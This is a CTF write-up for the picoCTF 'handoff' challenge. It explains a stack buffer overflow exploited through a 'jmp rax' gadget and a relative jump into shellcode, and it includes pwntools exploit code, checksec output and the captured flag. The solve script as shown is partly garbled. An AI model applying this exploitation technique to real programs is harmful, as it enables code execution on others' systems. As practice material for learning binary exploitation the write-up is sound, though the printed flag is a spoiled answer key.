In the provided source we are given 3 main pieces of functionality: creating a recipient in an array (max of 32 bytes), creating a message for the array (we will not use this), and giving feedback (max of 32 bytes, vulnerable to a buffer overflow). The protections are pretty much non-existent in the compiled binary, but the stack addresses are randomized so we can’t just jump to a known address in the stack.
Obtaining Code Execution
When debugging with gdb, I found the following to occur when I trigger a buffer overflow:
rax points to our input, which is executable. So, we can just jump to rax using the binary itself. Using cutter we can search for this gadget and find jmp rax at 0x40116c.
1 2 3 4 5 6 7 8
from pwn import * r = process(elf.path) r.sendline(b'3') # Select the 3rd option, exit and leave feedback payload = b'\xeb\xfe'*int((20)/2) # basically a 2 byte loop, never exits, 20 bytes is the size before the RIP overwrite payload += p64(4198764) # Address of jmp rax print(len(payload)) r.sendline(payload) r.interactive()
We can see that this does work, but now we have to achieve a shell.
Exploitation, For Real This Time
Breaking at 0x4012f3, we can intercept the first argument which will be the address of where the name is stored. The value is 0x7ffdd814b3e0 (will change if ran again). Than we can break at 0x4013e8 the exit function’s fgets. The value stored there is 0x7ffdd814b6b4. The offset is 724 bytes, so we can use the relative jump to jump 724 bytes back. After some tweaking the offset is actually 717 (idk why) and we have to pad our shell code. Finally, we have our solve script:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
from pwn import * elf = context.binary = ELF('./handoff')
#r = remote('shape-facility.picoctf.net', 64512) r = process(elf.path)
[*] '/home/h/Downloads/handoff' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments SHSTK: Enabled IBT: Enabled Stripped: No [+] Opening connection to shape-facility.picoctf.net on port 53879: Done [*] Switching to interactive mode What option would you like to do? 1. Add a new recipient 2. Send a message to a recipient 3. Exit the app What's the new recipient's name: What option would you like to do? 1. Add a new recipient 2. Send a message to a recipient 3. Exit the app Thank you for using this service! If you could take a second to write a quick review, we would really appreciate it: $ ls flag.txt handoff start.sh $ cat flag.txt picoCTF{p1v0ted_ftw_17db5315}